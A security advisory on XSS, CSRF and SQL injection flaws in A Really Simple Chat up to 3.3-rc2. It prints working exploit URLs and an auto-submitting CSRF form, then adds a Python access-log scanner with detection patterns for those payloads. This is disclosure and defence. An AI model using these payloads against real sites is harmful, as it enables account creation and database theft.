High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in A Really Simple Chat (ARSC) which could be exploited to perform cross-site scripting, cross-site request forgery and SQL injection attacks.
Cross-site scripting (XSS) vulnerability in A Really Simple Chat (ARSC): CVE-2011-2180
1.1 The vulnerability exists due to an input sanitization error in the “arsc_link” parameter in base/dereferer.php. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.
Exploitation example:
http://[host]/base/dereferer.php?arsc_link=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
Cross-site request forgery (CSRF) vulnerabilities in A Really Simple Chat (ARSC)
2.1 The vulnerability exists due to insufficient validation of the request origin in base/admin/add_user.php. A remote attacker can craft a web page that submits a forged request to that script, trick a logged-in administrator into visiting it and create arbitrary accounts.
Exploitation example:
<form action="http://[host]/base/admin/add_user.php" method="post" name="main">
<input name="arsc_newuser" value="test" type="hidden" />
<input type="submit" id="btn" name="submit" value="Submit ››" />
</form>
<script>
document.getElementById('btn').click();
</script>
SQL injection weakness in A Really Simple Chat (ARSC): CVE-2011-2181
3.1 The weakness exists due to input sanitization errors in the “arsc_user” parameter in base/admin/edit_user.php, the “arsc_layout_id” parameter in base/admin/edit_layout.php and the “arsc_room” parameter in base/admin/edit_room.php. A remote user with administrative privileges can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in the application's database. Combined with vulnerability #2 it is possible for a remote attacker to create an administrative account and then use it to exploit this weakness.
Exploitation examples:
http://[host]/base/admin/edit_user.php?arsc_user=-1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202
http://[host]/base/admin/edit_layout.php?arsc_layout_id=-1%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
http://[host]/base/admin/edit_room.php?arsc_room=%27%20union%20select%201,2,version%28%29,4,5,6,7%20--%202
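As an added example (not part of this advisory and not ARSC code), the following Python script shows how a defender would spot attempts against the three issues above in web-server access logs. It URL-decodes request parameters repeatedly (to catch double encoding) before matching: the arsc_link value of base/dereferer.php for HTML or script markup, the arsc_user, arsc_layout_id and arsc_room parameters of the admin edit scripts for a UNION SELECT, and POST requests to base/admin/add_user.php whose Referer is missing or points to another host. The log lines, host names and IP addresses below are constructed for the demonstration; the payloads are the ones quoted in this advisory.

```python
"""Detect attempts against the ARSC issues in this advisory in access logs.

Added example, not part of the advisory or of ARSC. The sample log is
constructed in Apache "combined" format; hosts and IPs are made up.
"""
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# combined format: ip ident user [time] "METHOD path HTTP/x" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Scripts and parameters named in the advisory.
SQLI_TARGETS = {
    "/base/admin/edit_user.php": "arsc_user",
    "/base/admin/edit_layout.php": "arsc_layout_id",
    "/base/admin/edit_room.php": "arsc_room",
}
XSS_TARGET = ("/base/dereferer.php", "arsc_link")
CSRF_TARGET = "/base/admin/add_user.php"

UNION_RE = re.compile(r"\bunion\b[\s/*]+(all[\s/*]+)?select\b", re.I)
HTML_RE = re.compile(r"<\s*/?\s*[a-z!]|javascript:|on[a-z]+\s*=", re.I)


def _decode(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (attackers double-encode) until the value is stable."""
    for _ in range(rounds):
        nxt = unquote_plus(value)
        if nxt == value:
            break
        value = nxt
    return value


def classify(line: str, site_host: str) -> list[str]:
    """Return the advisory findings a single log line matches (empty if none)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m["path"])
    params = {k: [_decode(v) for v in vs]
              for k, vs in parse_qs(url.query, keep_blank_values=True).items()}
    hits = []

    # CVE-2011-2180: reflected XSS through arsc_link in dereferer.php
    if url.path == XSS_TARGET[0] and any(HTML_RE.search(v) for v in params.get(XSS_TARGET[1], [])):
        hits.append("CVE-2011-2180 XSS")

    # CVE-2011-2181: UNION-based SQL injection in the admin edit scripts
    param = SQLI_TARGETS.get(url.path)
    if param and any(UNION_RE.search(v) for v in params.get(param, [])):
        hits.append("CVE-2011-2181 SQLi")

    # CSRF against add_user.php: a state-changing POST whose Referer is missing or
    # foreign. Browsers and proxies may strip Referer, so this is a weaker signal.
    if url.path == CSRF_TARGET and m["method"] == "POST":
        ref = m["referer"]
        ref_host = urlsplit(ref).hostname if ref not in ("", "-") else None
        if ref_host != site_host:
            hits.append("CSRF add_user.php (foreign or missing Referer)")
    return hits


def scan(log_text: str, site_host: str) -> list[tuple[str, str, list[str]]]:
    """Run classify() over a log; return (ip, script path, findings) for hits only."""
    out = []
    for line in log_text.splitlines():
        hits = classify(line, site_host)
        if hits:
            m = LOG_RE.match(line)
            out.append((m["ip"], urlsplit(m["path"]).path, hits))
    return out


# Constructed sample: lines 1, 3, 5 and 6 carry the advisory payloads (6 is double-encoded).
SAMPLE_LOG = """\
203.0.113.7 - - [21/Jun/2011:10:01:02 +0000] "GET /base/dereferer.php?arsc_link=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Jun/2011:10:01:09 +0000] "GET /base/dereferer.php?arsc_link=http%3A%2F%2Fwww.example.org%2F HTTP/1.1" 302 0 "http://chat.example/base/" "Mozilla/5.0"
198.51.100.4 - admin [21/Jun/2011:10:02:30 +0000] "POST /base/admin/add_user.php HTTP/1.1" 200 311 "http://attacker.example/lure.html" "Mozilla/5.0"
198.51.100.4 - admin [21/Jun/2011:10:03:12 +0000] "POST /base/admin/add_user.php HTTP/1.1" 200 311 "http://chat.example/base/admin/add_user.php" "Mozilla/5.0"
203.0.113.7 - admin [21/Jun/2011:10:05:44 +0000] "GET /base/admin/edit_user.php?arsc_user=-1%27%20union%20select%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - admin [21/Jun/2011:10:05:50 +0000] "GET /base/admin/edit_layout.php?arsc_layout_id=-1%2520union%2520select%25201,version%2528%2529,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - admin [21/Jun/2011:10:06:01 +0000] "GET /base/admin/edit_room.php?arsc_room=1 HTTP/1.1" 200 900 "http://chat.example/base/admin/" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, path, hits in scan(SAMPLE_LOG, "chat.example"):
        print(f"{ip} {path}: {', '.join(hits)}")
```

The decode-before-match step matters: the sixth sample line is the edit_layout.php payload encoded twice, which a pattern applied to the raw request line would miss. The CSRF rule only has the Referer to work with because the combined log format does not record the Origin header; at the application level the real fix is a per-session anti-CSRF token on add_user.php, which no log rule replaces.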
Affected products (CPE):

Name | Operator | Version
---|---|---
A Really Simple Chat (ARSC) | le (less than or equal to) | 3.3-rc2